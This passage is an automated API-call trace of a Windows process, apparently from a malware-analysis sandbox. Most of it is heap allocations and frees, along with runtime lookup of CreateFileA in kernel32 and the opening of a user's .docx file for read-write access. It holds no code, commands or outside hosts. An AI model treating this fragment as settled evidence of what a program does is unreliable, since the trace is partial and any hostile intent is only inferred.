lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0170.871] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0170.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fd0 [0170.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0170.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.875] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0170.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0170.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0170.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.875] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0170.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0170.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db0a8 [0170.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", cchWideChar=58, lpMultiByteStr=0x8db0a8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpUsedDefaultChar=0x0) returned 58 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0170.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.877] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j0tjz4pqz2gw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0170.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0170.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afe68 [0170.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=58, lpWideCharStr=0x8afe68, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx") returned 58 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0170.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.880] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: 